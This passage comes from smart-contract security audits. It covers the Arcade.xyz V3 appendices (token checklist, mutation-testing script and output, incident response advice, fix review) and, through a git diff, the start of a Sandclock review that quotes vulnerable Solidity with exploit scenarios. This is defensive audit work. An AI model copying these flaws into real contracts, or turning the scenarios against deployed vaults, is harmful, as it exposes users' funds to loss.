introduces additional risks and complexities for the lender, the borrower, and the protocol in general. ● Gaming tokens with alterable intrinsic value should be avoided. Tokens are often used to represent unique digital assets in gaming environments, such as characters, equipment, and virtual real estate. Using them as collateral in a lending protocol carries some risks, such as the following: ○ Developer control: Game developers often maintain a degree of control over in-game assets, which may include the ability to create, modify, or destroy assets. If a game developer decides to flood the market with copies of a previously rare asset, or alter its capabilities within the game, the value of the collateral could be significantly affected. ○ In-game rules and actions: In-game actions by other players or changes to in-game rules can influence the value of the token. For instance, if the game involves player competition, other players’ actions could diminish the value of the collateral token. 64 Arcade.xyz V3 Security Assessment E. Token Integration Checklist The following checklist provides recommendations for interactions with arbitrary tokens. Every unchecked item should be justified, and its associated risks, understood. For an up-to-date version of the checklist, see crytic/building-secure-contracts. For convenience, all Slither utilities can be run directly on a token address, such as the following: slither-check-erc 0xdac17f958d2ee523a2206206994597c13d831ec7 TetherToken --erc erc20 slither-check-erc 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d KittyCore --erc erc721 To follow this checklist, use the below output from Slither for the token: slither-check-erc [target] [contractName] [optional: --erc ERC_NUMBER] slither [target] --print human-summary slither [target] --print contract-summary slither-prop . --contract ContractName # requires configuration, and use of Echidna and Manticore General Considerations ❏ The contract has a security review. Avoid interacting with contracts that lack a security review. Check the length of the assessment (i.e., the level of effort), the reputation of the security firm, and the number and severity of the findings. ❏ You have contacted the developers. You may need to alert their team to an incident. Look for appropriate contacts on blockchain-security-contacts. ❏ They have a security mailing list for critical announcements. Their team should advise users (like you!) when critical issues are found or when upgrades occur. Contract Composition ❏ The contract avoids unnecessary complexity. The token should be a simple contract; a token with complex code requires a higher standard of review. Use Slither’s human-summary printer to identify complex code. ❏ The contract uses SafeMath. Contracts that do not use SafeMath require a higher standard of review. Inspect the contract by hand for SafeMath usage. ❏ The contract has only a few non-token-related functions. Non-token-related functions increase the likelihood of an issue in the contract. Use Slither’s contract-summary printer to broadly review the code used in the contract. 65 Arcade.xyz V3 Security Assessment ❏ The token has only one address. Tokens with multiple entry points for balance updates can break internal bookkeeping based on the address (e.g., balances[token_address][msg.sender] may not reflect the actual balance). Owner Privileges ❏ The token is not upgradeable. Upgradeable contracts may change their rules over time. Use Slither’s human-summary printer to determine whether the contract is upgradeable. ❏ The owner has limited minting capabilities. Malicious or compromised owners can abuse minting capabilities. Use Slither’s human-summary printer to review minting capabilities, and consider manually reviewing the code. ❏ The token is not pausable. Malicious or compromised owners can trap contracts relying on pausable tokens. Identify pausable code by hand. ❏ The owner cannot blacklist the contract. Malicious or compromised owners can trap contracts relying on tokens with a blacklist. Identify blacklisting features by hand. ❏ The team behind the token is known and can be held responsible for abuse. Contracts with anonymous development teams or teams that reside in legal shelters require a higher standard of review. ERC20 Tokens ERC20 Conformity Checks Slither includes a utility, slither-check-erc, that reviews the conformance of a token to many related ERC standards. Use slither-check-erc to review the following: ❏ Transfer and transferFrom return a boolean. Several tokens do not return a boolean on these functions. As a result, their calls in the contract might fail. ❏ The name, decimals, and symbol functions are present if used. These functions are optional in the ERC20 standard and may not be present. ❏ Decimals returns a uint8. Several tokens incorrectly return a uint256. In such cases, ensure that the value returned is below 255. ❏ The token mitigates the known ERC20 race condition. The ERC20 standard has a known ERC20 race condition that must be mitigated to prevent attackers from stealing tokens. Slither includes a utility, slither-prop, that generates unit tests and security properties that can discover many common ERC flaws. Use slither-prop to review the following: 66 Arcade.xyz V3 Security Assessment ❏ The contract passes all unit tests and security properties from slither-prop. Run the generated unit tests and then check the properties with Echidna and Manticore. Risks of ERC20 Extensions The behavior of certain contracts may differ from the original ERC specification. Conduct a manual review of the following conditions: ❏ The token is not an ERC777 token and has no external function call in transfer or transferFrom. External calls in the transfer functions can lead to reentrancies. ❏ Transfer and transferFrom should not take a fee. Deflationary tokens can lead to unexpected behavior. ❏ Potential interest earned from the token is taken into account. Some tokens distribute interest to token holders. This interest may be trapped in the contract if not taken into account. Token Scarcity Reviews of token scarcity issues must be executed manually. Check for the following conditions: ❏ The supply is owned by more than a few users. If a few users own most of the tokens, they can influence operations based on the tokens’ repartition. ❏ The total supply is sufficient. Tokens with a low total supply can be easily manipulated. ❏ The tokens are located in more than a few exchanges. If all the tokens are in one exchange, a compromise of the exchange could compromise the contract relying on the token. ❏ Users understand the risks associated with a large amount of funds or flash loans. Contracts relying on the token balance must account for attackers with a large amount of funds or attacks executed through flash loans. ❏ The token does not allow flash minting. Flash minting can lead to substantial swings in the balance and the total supply, which necessitate strict and comprehensive overflow checks in the operation of the token. 67 Arcade.xyz V3 Security Assessment ERC721 Tokens ERC721 Conformity Checks The behavior of certain contracts may differ from the original ERC specification. Conduct a manual review of the following conditions: ❏ Transfers of tokens to the 0x0 address revert. Several tokens allow transfers to 0x0 and consider tokens transferred to that address to have been burned; however, the ERC721 standard requires that such transfers revert. ❏ safeTransferFrom functions are implemented with the correct signature. Several token contracts do not implement these functions. A transfer of NFTs to one of those contracts can result in a loss of assets. ❏ The name, decimals, and symbol functions are present if used. These functions are optional in the ERC721 standard and may not be present. ❏ If it is used, the decimals function returns a uint8(0). Other values are invalid. ❏ The name and symbol functions can return an empty string. This behavior is allowed by the standard. ❏ The ownerOf function reverts if the tokenId is invalid or is set to a token that has already been burned. The function cannot return 0x0. This behavior is required by the standard, but it is not always properly implemented. ❏ A transfer of an NFT clears its approvals. This is required by the standard. ❏ The token ID of an NFT cannot be changed during its lifetime. This is required by the standard. Common Risks of the ERC721 Standard To mitigate the risks associated with ERC721 contracts, conduct a manual review of the following conditions: ❏ The onERC721Received callback is taken into account. External calls in the transfer functions can lead to reentrancies, especially when the callback is not explicit (e.g., in safeMint calls). 68 Arcade.xyz V3 Security Assessment ❏ When an NFT is minted, it is safely transferred to a smart contract. If there is a minting function, it should behave similarly to safeTransferFrom and properly handle the minting of new tokens to a smart contract. This will prevent a loss of assets. ❏ The burning of a token clears its approvals. If there is a burning function, it should clear the token’s previous approvals 69 Arcade.xyz V3 Security Assessment F. Mutation Testing The goal of mutation testing is to gain insight into a codebase’s test coverage. Mutation tests go line-by-line through the target file, mutate the given line in some way, run tests, and flag changes that do not trigger test failures. Depending on the complexity of the logic in any given line and the tool used to mutate, mutation tests could test upwards of 50 mutants per line of source code. Mutation testing is a slow process, but by highlighting areas of the code with incomplete test coverage, it allows auditors to focus their manual review on the parts of the code that are most likely to contain latent bugs. In this section, we provide information on available mutation testing tools that could be used in the Arcade V3 codebase, and we describe the mutation testing campaign that we conducted during this audit. The following are available mutation testing tools: ● Universalmutator: This tool generates deterministic mutants from regular expressions; it supports many source code languages, including Solidity and Vyper. Refer to the 2018 ICSE paper on the tool and this guest blog post about the tool on the blog for more information. ● Necessist: This tool was developed in-house by . It operates on tests rather than source code, although it has a similar end goal. Necessist could provide a nice complement to source-focused mutation testing. Due to the time-boxed nature of this review, we deprioritized the use of Necessist to conduct an additional mutation testing campaign. ● Vertigo: This tool was developed by security researchers at Consensys Diligence. Integration with Foundry is planned, but the current progress on that work is unclear. Known scalability issues are present in the tool. ● Gambit: This tool generates stochastic mutants by modifying the Solidity AST. It is optimized for integration with the Certora prover. We used universalmutator to conduct a mutation testing campaign during this engagement because the mutants it generates are deterministic and because it is a relatively mature tool with few known issues. This tool can be installed with the following command: pip install universalmutator Figure F.1: The command used to install universalmutator Once installed, a mutation campaign can be run against all Solidity source files using the following bash script: 70 Arcade.xyz V3 Security Assessment 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 find contracts \ -name '*.sol' \ -not -path '*/interfaces/*' \ -not -path '*/test/*' \ -not -path '*/external/*' \ -print0 | while IFS= read -r -d '' file do name="$(basename "$file" .sol)" dir="mutants/$name" mkdir -p "$dir" echo "Mutating $file" mutate "$file" \ --cmd "timeout 200s npx hardhat test" \ --mutantDir "$dir" \ > "mutants/$name.log" done Figure F.2: A bash script that runs a mutation testing campaign against each Solidity file in the contracts directory Consider the following notes about the above bash script: ● The overall runtime of the above script against all non-excluded Solidity files in the target contracts repository is approximately one week on a modern M2 Mac. This execution time is directly related to the npx hardhat test tool runtime and the number of contracts to be mutated. ● The --cmd argument on line 13 specifies the command to run for each mutant. This command is prefixed by timeout 200s (timeout is a tool included in the coreutils package on macOS) because a healthy run of the test suite was measured to take approximately 150 seconds. A timeout longer than the average test suite runtime is used only to cut off test runs that are badly stalled. The results of each target’s mutation tests are saved in a file, per line 15 of the script in figure F.2. An illustrative example of such output is shown in figure F.3. *** UNIVERSALMUTATOR *** MUTATING WITH RULES: audit-arcade/custom-solidity.rules FAILED TO FIND RULE audit-arcade/custom-solidity.rules AS BUILT-IN... SKIPPED 458 MUTANTS ONLY CHANGING STRING LITERALS 2761 MUTANTS GENERATED BY RULES ... PROCESSING MUTANT: 121: OC_ZeroAddress(); ==> OC_ZeroAddress();...INVALID PROCESSING MUTANT: 121: OC_ZeroAddress(); ==> OC_ZeroAddress();...VALID [written to mutants/OriginationController/OriginationController.mutant.25.sol] if (_feeController == address(0)) revert if (_feeController <= address(0)) revert if (_feeController == address(0)) revert if (_feeController != address(0)) revert 71 Arcade.xyz V3 Security Assessment ) public override returns (uint256 newLoanId) { ==> ) public override returns (uint256 newLoanId) { ==> if (_feeController == address(0)) revert if (_feeController >= address(0)) revert {...INVALID PROCESSING MUTANT: 121: OC_ZeroAddress(); ==> OC_ZeroAddress();...INVALID ... PROCESSING MUTANT: 375: ) public override returns (uint256 PROCESSING MUTANT: 375: ) public override returns (uint256 newLoanId) ...INVALID PROCESSING MUTANT: 375: /*_validateLoanTerms(loanTerms);*/...VALID [written to mutants/OriginationController/OriginationController.mutant.46.sol] PROCESSING MUTANT: 375: selfdestruct(msg.sender);...INVALID PROCESSING MUTANT: 375: revert();...INVALID ... 156 VALID MUTANTS 2605 INVALID MUTANTS 0 REDUNDANT MUTANTS Valid Percentage: 5.650126765664615% _validateLoanTerms(loanTerms); ==> _validateLoanTerms(loanTerms); ==> _validateLoanTerms(loanTerms); ==> Figure F.3: Abbreviated output from the mutation testing campaign on OriginationController.sol The output of universalmutator starts with the number of mutants generated and ends with a summary of how many of these mutants are valid. A small percentage of valid mutants indicates thorough test coverage. The first highlighted snippet in the middle of the output is focused on mutations made to line 121 of the OriginationController source code. This particular line shows a mutation with a false positive: this means that while the mutant compiles and passes all tests, the mutation does not imply failure in test coverage because the address cannot be negative. Other types of common false positives include removing the public visibility modifier from variable or function declarations. However, the second highlighted snippet shows that commenting out line 375 of the OriginationController source code makes the test run succeed. Because this change can have consequences in the results of the function, this mutant is expected to be invalid given thorough test coverage. In that particular case, it means that none of the implemented tests for the OriginationController contract tries to roll over a loan with invalid loan terms. For auditors, this is a cue to take an extra close look at the implementation of this method and at its use throughout the rest of the codebase. We recommend running mutation tests on the code every time major changes are made to the code or to the test suite, and we recommend filtering the results to ensure that the test coverage is correct. 72 Arcade.xyz V3 Security Assessment G. Incident Response Plan Recommendations This section provides recommendations on formulating an incident response plan. ● Identify the parties (either specific people or roles) responsible for implementing the mitigations when an issue occurs (e.g., deploying smart contracts, pausing contracts, upgrading the front end, etc.). ● Clearly describe the intended contract deployment process. ● Outline the circumstances under which the Arcade protocol will compensate users affected by an issue (if any). ○ Issues that warrant compensation could include an individual or aggregate loss or a loss resulting from user error, a contract flaw, or a third-party contract flaw. ● Document how the team plans to stay up to date on new issues that could affect the system; awareness of such issues will inform future development work and help the team secure the deployment toolchain and the external on-chain and off-chain services that the system relies on. ○ Identify sources of vulnerability news for each language and component used in the system, and subscribe to updates from each source. Consider creating a private Discord channel in which a bot will post the latest vulnerability news; this will provide the team with a way to track all updates in one place. Lastly, consider assigning certain team members to track news about vulnerabilities in specific components of the system. ● Determine when the team will seek assistance from external parties (e.g., auditors, affected users, other protocol developers, etc.) and how it will onboard them. ○ Effective remediation of certain issues may require collaboration with external parties. ● Define contract behavior that would be considered abnormal by off-chain monitoring solutions. It is best practice to perform periodic dry runs of scenarios outlined in the incident response plan to find omissions and opportunities for improvement and to develop “muscle memory.” Additionally, document the frequency with which the team should perform dry runs of various scenarios, and perform dry runs of more likely scenarios more 73 Arcade.xyz V3 Security Assessment regularly. Create a template to be filled out with descriptions of any necessary improvements after each dry run. 74 Arcade.xyz V3 Security Assessment H. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On July 24 to July 25, 2023, reviewed the fixes and mitigations implemented by the Arcade team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the 16 issues described in this report, Arcade has resolved 12 issues and has not resolved the remaining four issues. For additional information, please see the Detailed Fix Review Results below. ID Title Severity Status 1 2 3 4 5 6 7 8 Different zero-address errors thrown by single and batch NFT withdrawal functions Informational Resolved Solidity compiler optimizations can be problematic Undetermined Unresolved callApprove does not follow approval best practices Informational Resolved Risk of confusing events due to missing checks in whitelist contracts Low Resolved Missing checks of _exists() return value Informational Resolved Incorrect deployers in integration tests Informational Resolved Risk of out-of-gas revert due to use of transfer() in claimFees Informational Resolved Risk of lost funds due to lack of zero-address check in functions Medium Resolved 75 Arcade.xyz V3 Security Assessment 9 The maximum value for FL_09 is not set by FeeController Low Resolved 10 Fees can be changed while a loan is active Low Resolved 11 Asset vault nesting can lead to loss of assets Low Unresolved 12 13 14 15 16 Risk of locked assets due to use of _mint instead of _safeMint Medium Resolved Borrowers cannot realize full loan value without risking default Medium Resolved itemPredicates encoded incorrectly according to EIP-712 Low Resolved The fee values can distort the incentives for the borrowers and lenders Informational Unresolved Malicious borrowers can use forceRepay to grief lenders Medium Unresolved Detailed Fix Review Results TOB-ARCADE-1: Different zero-address errors thrown by single and batch NFT withdrawal functions Resolved in commits 00e8130 and 8542c46. The AV_ZeroAddress error was updated to include a string addressType argument that is used to indicate which address parameter violated a zero-address check requirement. Additional zero-address checks were added to functions in the AssetVault contract, unit tests were implemented to ensure that these checks work as expected, and the NatSpec comments were updated to reflect this update. TOB-ARCADE-2: Solidity compiler optimizations can be problematic Unresolved. Arcade provided the following statement about this issue: The Arcade team understands that Solidity compiler optimizations may potentially be problematic. However to remove our compiler optimization we would need to downsize four of our smart contracts in extensive ways, breaking them up into smaller contracts and considerably increasing our code footprint, introducing more complexity and possibly new risks. 76 Arcade.xyz V3 Security Assessment We elected not to do this at this time, given that the existence of a vulnerability remains undetermined. Before the next major protocol release, the Arcade team will revisit this issue. TOB-ARCADE-3: callApprove does not follow approval best practices Resolved in commits a3ce932 and 77c1db0. The AssetVault contract now includes two new functions, callIncreaseAllowance and callDecreaseAllowance, which enable safe interactions with Arcade for third-party integrations. The callApprove function was temporarily removed in commit a3ce932 but was subsequently added back in commit 77c1db0. To aid third-party integrators and test the expected functionality of the newly added functions, documentation and unit tests have been added appropriately. TOB-ARCADE-4: Risk of confusing events due to missing checks in whitelist contracts Resolved in commit 2434705. Two new error types, CW_AlreadyWhitelisted and CW_NotWhitelisted, have been added and implemented for whitelisting functions. If the address has already been added or the address targeted for removal is not found, the whitelisting functions will now revert. NatSpec comments have been added to describe each error, and unit tests have been included to test the add and remove functions for the expected revert. TOB-ARCADE-5: Missing checks of _exists() return value Resolved in commit e04502b. New reasons for DoesNotExist reverts were added to the Lending and Vault contracts. The VaultFactory and PromissoryNote contracts now use these revert reasons in the tokenURI functions when the requested tokenId is nonexistent. Additionally, new tests were implemented for VaultFactory and PromissoryNote that check for the expected revert reason when a nonexistent tokenId is used. TOB-ARCADE-6: Incorrect deployers in integration tests Resolved in commit dddc905. The incorrect deployers in integration test cases were changed from signers[0] to admin. A new test was implemented to check that the correct permissions are set when the protocol is deployed. TOB-ARCADE-7: Risk of out-of-gas revert due to use of transfer() in claimFees Resolved in commit a948cfc. Comments were added to inform users and developers about the issue, but no further changes were made to the contract. TOB-ARCADE-8: Risk of lost funds due to lack of zero-address check in functions Resolved in commit a6dbd53. Existing error types related to ZeroAddress were modified to include a string parameter indicating the address that failed the zero-address check (also refer to the fix status for issue TOB-ARCADE-1). The uses of the old error type with no arguments were replaced with the new version. 77 Arcade.xyz V3 Security Assessment New zero-address checks for the token and destination addresses were implemented in the LoanCore.withdraw and LoanCore.withdrawProtocolFees functions. Checks for the destination address were added to the RepaymentController.redeemNote and VaultFactory.claimFees functions. Existing tests were modified to account for the new string parameter in error types, and new tests were implemented for zero-address parameters in the fixed functions. TOB-ARCADE-9: The maximum value for FL_09 is not set by FeeController Resolved in commit a51dfd8. The value of maxFees[FL_09] is now set properly in the constructor of the FeeController contract. The unit test suite has also been expanded to include tests that ensure that all maximum fee values are properly set. TOB-ARCADE-10: Fees can be changed while a loan is active Resolved in commit f7b87a7. The fix implemented for this issue consists of several parts. Fee names were changed. Previously, the FeeLookups constants ranged from FL_01 to FL_09, where FL_01 was the vault minting fee and FL_02 to FL_09 were the different fees that the borrowers and lenders should pay for a loan. The Arcade team renamed FL_02 through FL_09 to FL_01 through FL_08 and removed the former FL_01 from FeeLookups and replaced it with vaultMintFee in FeeController. The functions for setting and getting the fees were renamed to setLendingFee and getLendingFee, respectively. The new getFeesOrigination and getFeesRollover functions were added to simplify the process of retrieving the fees for the loan origination and rollover processes. A new FeeSnapshot structure was created to take a snapshot of the fee values at the moment a loan is originated to ensure that future changes to fees do not affect existing loans. However, only the values for the default, interest, and principal fees (fees FL_05 through FL_07) are stored, and the redeem fee (FL_08) is read from feeController at the moment of redeeming. Even though this feels counterintuitive, it is consistent with the statement given by Arcade for the fix status of finding TOB-ARCADE-16; having the redeem fee read from feeController allows protocol admins to change the fee to prevent griefing. Existing tests were modified to comply with the new changes. New tests were added in RepaymentController and feeController. TOB-ARCADE-11: Asset vault nesting can lead to loss of assets Unresolved. Arcade provided the following statement about this issue: The Arcade team understands the likelihood of this problem occurring is quite low because our UI does not allow for vault keys (vault tracking ERC721 tokens) to be 78 Arcade.xyz V3 Security Assessment deposited inside another vault contract. A power user would need to execute this type of vault key transfer via Etherscan. We elect to address this issue by: ● Thoroughly documenting this risk and providing clear and comprehensive warnings against this specific action in the documentation ● Maintaining our user interface to ensure that it does not present the option of using vault keys as collateral for loans TOB-ARCADE-12: Risk of locked assets due to use of _mint instead of _safeMint Resolved in commit 20b7c66. The mint function in the PromissoryNote contract has been updated to use _safeMint instead of _mint. Similarly, the initializeBundle function in the VaultFactory contract now uses _safeMint instead of _mint. These changes ensure that an ERC-721 token is not sent to a contract address that is not configured to receive it. The NatSpec comments have also been updated to reflect these changes. Additionally, the unit testing suite and mock contracts have been updated to adequately test the new expected behavior of the two altered functions. TOB-ARCADE-13: Borrowers cannot realize full loan value without risking default Resolved in commits 6586c37 and f1eb8ae. A new grace period after the original loan’s due date was introduced with the first commit. The grace period added in this commit was a configurable setting that can be between one hour and seven days. An admin-only function was added to set the new value, which emits events on changes or errors. A new set of unit tests was added for the setGracePeriod functionality, and existing tests were modified to take the grace period into account. However, in the second commit, the variable grace period was replaced with a constant 10-minute period. The variable period tests were removed, and the remaining tests were modified to account for the change. TOB-ARCADE-14: itemPredicates encoded incorrectly according to EIP-712 Resolved in commit c95e21c. Item predicates are now encoded in compliance with the EIP-712 standard. Rather than a hash representing an array of item predicates, an array of the actual Predicate structs to be signed is now presented to the signer. A _PREDICATE_TYPEHASH has been created, and the _ITEMS_TYPEHASH has been updated to correctly account for the array of Predicate structs that is now represented in the signature. The unit tests dealing with signatures that include items have been updated to reflect the changes to the signature scheme. TOB-ARCADE-15: The fee values can distort the incentives for the borrowers and lenders Unresolved. Arcade provided the following statement about this issue: 79 Arcade.xyz V3 Security Assessment Our V3 documentation will comprehensively outline all fees within the lending protocol, pointing the users to their values at loan initiation. The Arcade team’s objective is to help users grasp potential profits and anticipated fees linked with loan repayment, rollover, default, or redemption scenarios. TOB-ARCADE-16: Malicious borrowers can use forceRepay to grief lenders Unresolved. Arcade provided the following statement about this issue: The Arcade.xyz team is aware that for honest lenders, having forceRepay called incurs additional gas cost and possible fees. Nevertheless, the team has elected to keep the implementation as-is: we feel that having two separate functions is a more explicit, less "surprising" design compared to having a single function whose effects may change based on external state. In general, we believe the vector allowing borrower griefing is best mitigated through proper incentive management and counterparty relationship management: borrowers who have griefed lenders in the past are likely to receive lending offers with higher premiums, as lenders try to mitigate their risk. In a larger sense, if griefing becomes a protocol-wide issue, redeem fees can be set to 0. 80 Arcade.xyz V3 Security Assessment diff --git a/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt b/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt new file mode 100644 index 0000000..c3b0ab0 Binary files /dev/null and b/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt differ diff --git a/findings_newupdate/tob/2023-07-sandclock-securityreview.txt b/findings_newupdate/tob/2023-07-sandclock-securityreview.txt new file mode 100644 index 0000000..10657bf --- /dev/null +++ b/findings_newupdate/tob/2023-07-sandclock-securityreview.txt @@ -0,0 +1,11 @@ +1. receiveFlashLoan does not account for fees Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-1 Target: src/steth/scWETHv2.sol , src/steth/scUSDCv2.sol Description The receiveFlashLoan functions of the scWETHv2 and scUSDCv2 vaults ignore the Balancer flash loan fees and repay exactly the amount that was loaned. This is not currently an issue because the Balancer vault does not charge any fees for flash loans. However, if Balancer implements fees for flash loans in the future, the Sandclock vaults would be prevented from withdrawing investments back into the vault. function flashLoan ( IFlashLoanRecipient recipient, IERC20[] memory tokens, uint256 [] memory amounts, bytes memory userData ) external override nonReentrant whenNotPaused { uint256 [] memory feeAmounts = new uint256 [](tokens.length); uint256 [] memory preLoanBalances = new uint256 [](tokens.length); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 amount = amounts[i]; preLoanBalances[i] = token.balanceOf( address ( this )); feeAmounts[i] = _calculateFlashLoanFeeAmount(amount); token.safeTransfer( address (recipient), amount); } recipient.receiveFlashLoan(tokens, amounts, feeAmounts , userData); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 preLoanBalance = preLoanBalances[i]; uint256 postLoanBalance = token.balanceOf( address ( this )); uint256 receivedFeeAmount = postLoanBalance - preLoanBalance; _require(receivedFeeAmount >= feeAmounts[i]); _payFeeAmount(token, receivedFeeAmount); } } Figure 1.1: Abbreviated code showing the receivedFeeAmount check in the Balancer flashLoan method in 0xBA12222222228d8Ba445958a75a0704d566BF2C8#code#F5#L78 In the Balancer flashLoan function , shown in figure 1.1, the contract calls the recipient’s receiveFlashLoan function with four arguments: the addresses of the tokens loaned, the amounts for each token, the fees to be paid for the loan for each token, and the calldata provided by the caller. The Sandclock vaults ignore the fee amount and repay only the principal, which would lead to reverts if the fees are ever changed to nonzero values. Although this problem is present in multiple vaults, the receiveFlashLoan implementation of the scWETHv2 contract is shown in figure 1.2 as an illustrative example: function receiveFlashLoan ( address [] memory , uint256 [] memory amounts, uint256 [] memory , bytes memory userData) external { _isFlashLoanInitiated(); // the amount flashloaned uint256 flashLoanAmount = amounts[ 0 ]; // decode user data bytes [] memory callData = abi.decode(userData, ( bytes [])); _multiCall(callData); // payback flashloan asset.safeTransfer( address (balancerVault), flashLoanAmount ); _enforceFloat(); } Figure 1.2: The feeAmounts parameter is ignored by the receiveFlashLoan method. ( sandclock-contracts/src/steth/scWETHv2.sol#L232–L249 ) Exploit Scenario After Sandclock’s scUSDv2 and scWETHv2 vaults are deployed and users start depositing assets, the Balancer governance system decides to start charging fees for flash loans. Users of the Sandclock protocol now discover that, apart from the float margin, most of their funds are locked because it is impossible to use the flash loan functions to withdraw vault assets from the underlying investment pools. Recommendations Short term, use the feeAmounts parameter in the calculation for repayment to account for future Balancer flash loan fees. This will prevent unexpected reverts in the flash loan handler function. Long term, document and justify all ignored arguments provided by external callers. This will facilitate a review of the system’s third-party interactions and help prevent similar issues from being introduced in the future. +2. Reward token distribution rate can diverge from reward token balance Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-2 Target: src/staking/RewardTracker.sol Description The privileged distributor role is responsible for transferring reward tokens to the RewardTracker contract and then passing the number of tokens sent as the _reward parameter to the notifyRewardAmount method. However, the _reward parameter provided to this method can be larger than the number of reward tokens transferred. Given the accounting for leftover rewards, such a situation would be difficult to recover from. /// @notice Lets a reward distributor start a new reward period. The reward tokens must have already /// been transferred to this contract before calling this function. If it is called /// when a reward period is still active, a new reward period will begin from the time /// of calling this function, using the leftover rewards from the old reward period plus /// the newly sent rewards as the reward. /// @dev If the reward amount will cause an overflow when computing rewardPerToken, then /// this function will revert. /// @param _reward The amount of reward tokens to use in the new reward period. function notifyRewardAmount ( uint256 _reward ) external onlyDistributor { _notifyRewardAmount(_reward); } Figure 2.1: The comment on the notifyRewardAmount method hints at an unenforced assumption that the number of reward tokens transferred must be equal to the _reward parameter provided. ( sandclock-contracts/src/staking/RewardTracker.sol#L185–L195 ) If a _reward value smaller than the actual number of transferred tokens is provided, the situation can be fixed by calling notifyRewardAmount again with a _reward parameter that accounts for the difference between the RewardTracker contract’s actual token balance and the rewards already scheduled for distribution. This solution is possible because the _notifyRewardAmount helper function accounts for leftover rewards if it is called during an ongoing reward period. function _notifyRewardAmount ( uint256 _reward ) internal { ... uint64 rewardRate_ = rewardRate; uint64 periodFinish_ = periodFinish; uint64 duration_ = duration; ... if ( block.timestamp >= periodFinish_) { newRewardRate = _reward / duration_; } else { uint256 remaining = periodFinish_ - block.timestamp ; uint256 leftover = remaining * rewardRate_; newRewardRate = (_reward + leftover ) / duration_; } Figure 2.2: The accounting for leftover rewards in the _notifyRewardAmount helper method ( sandclock-contracts/src/staking/RewardTracker.sol#L226–L262 ) This accounting for leftover rewards, however, makes the situation difficult to recover from if a _reward parameter that is too large is provided to the notifyRewardAmount method. As shown by the arithmetic in figure 2.2, if the reward period has not finished, the code for creating the newRewardRate value can only add to the reward distribution, not subtract from it. The only way to bring a too-large reward distribution back in line with the RewardTracker contract’s reward token balance is to transfer additional reward tokens to the contract. Exploit Scenario The RewardTracker distributor transfers 10 reward tokens to the RewardTracker contract and then mistakenly calls the notifyRewardAmount method with a _reward parameter of 100. Some users call the claimRewards method early and receive inflated rewards until the contract’s balance is depleted, leaving later users unable to claim any rewards. To recover, the distributor either needs to provide another 90 reward tokens to the RewardTracker contract or accept the reputational loss of allowing this misconfigured reward period to finish before resetting the reward payouts correctly during the next period. Recommendations Short term, modify the _notifyRewardAmount helper function to reset the rewardRate so that it is in line with the current rewardToken balance and the time remaining in the reward period. This change could also allow the fetchRewards method to maintain its current behavior but with only a single rewardToken.balanceOf external call. Long term, review the internal accounting state variables and document the ways in which they are influenced by the actual flow of funds. Pay attention to any internal accounting values that can be influenced by external sources, including privileged accounts, and reexamine the system’s assumptions surrounding the flow of funds. +3. Miscalculation in beforeWithdraw can leave the vault with less than minimum float Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-3 Target: src/steth/scWETHv2.sol Description When a user wants to redeem or withdraw, the beforeWithdraw function is called with the number of assets to be withdrawn as the assets parameter. This function makes sure that if the value of the float parameter (that is, the available assets in the vault) is not enough to pay for the withdrawal, the strategy gets some assets back from the pools to be able to pay. function beforeWithdraw ( uint256 assets , uint256 ) internal override { uint256 float = asset.balanceOf( address ( this )); if (assets <= float) return ; uint256 minimumFloat = minimumFloatAmount; uint256 floatRequired = float < minimumFloat ? minimumFloat - float : 0 ; uint256 missing = assets + floatRequired - float; _withdrawToVault(missing); } Figure 3.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L386–L396 When the float value is enough, the function returns and the withdrawal is paid with the existing float. If the float value is not enough, the missing amount is recovered from the pools via the adapters. The issue lies in the calculation of the missing parameter: it does not guarantee that the float value remaining after the withdrawal is at least the value of the minimumFloatAmount parameter. The consequence is that the calculation always leaves a float equal to floatRequired in the vault. If this value is small enough, it can cause users to waste gas when withdrawing small amounts because they will need to pay for the gas-intensive _withdrawToVault action. This eclipses the usefulness of having the float in the vault. The correct calculation should be uint256 missing = assets + minimumFloat - float; . Using this correct calculation would make the calculation of the floatRequired parameter unnecessary as it would no longer be required or used in the rest of the code. Exploit Scenario The value for minimumFloatAmount is set to 1 ether in the scWETHv2 contract. For this scenario, suppose that the current float is exactly equal to minimumFloatAmount . Alice wants to withdraw 0.15 WETH from her invested amount. Because this amount is less than the current float, her withdrawal is paid from the vault assets, leaving the float equal to 0.85 WETH after the operation. Then, Bill wants to withdraw 0.9 WETH, but the vault has no available assets to pay for it. In this case, when beforeWithdraw is called, Bill has to pay gas for the call to _withdrawToVault , which is an expensive action because it includes gas-intensive operations such as loops and a flash loan. After Bill’s withdrawal, the float in the vault is 0.15 WETH. This is a relatively small amount compared with minimumFloatValue , and it will likely make the next withdrawing/redeeming user also have to pay for the call to _withdrawToVault . Recommendations Short term, replace the calculation of the missing amount to be withdrawn on line 393 of the scWETHv2 contract with assets + minimumFloat - float . This calculation will ensure that the minimum float restriction is enforced after withdrawals. It will take the required float into consideration, so the separate calculation of floatRequired on line 392 of scWETHv2 would no longer be required. Long term, add unit or fuzz tests to make sure that the vault has an amount of assets equal to or greater than the minimum expected amount at all times. +4. Last user in scWETHv2 vault will not be able to withdraw their funds Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SANDCLOCK-4 Target: src/steth/scWETHv2.sol Description When a user wants to withdraw, the withdrawal amount is checked against the current vault float (the uninvested assets readily available in the vault). If the withdrawal amount is less than the float, the amount is paid from the available balance; otherwise, the protocol has to disinvest from the strategies to get the required assets to pay for the withdrawal. The issue with this approach is that in order to maintain a float equal to the minimumFloatValue parameter in the vault, the value to be disinvested from the strategies is calculated in the beforeWithdraw function, and its correct value is equal to the sum of the amount to be withdrawn and the minimum float minus the current float. If there is only one user remaining in the vault and they want to withdraw, this enforcement will not allow them to do so, because there will not be enough invested in the strategies 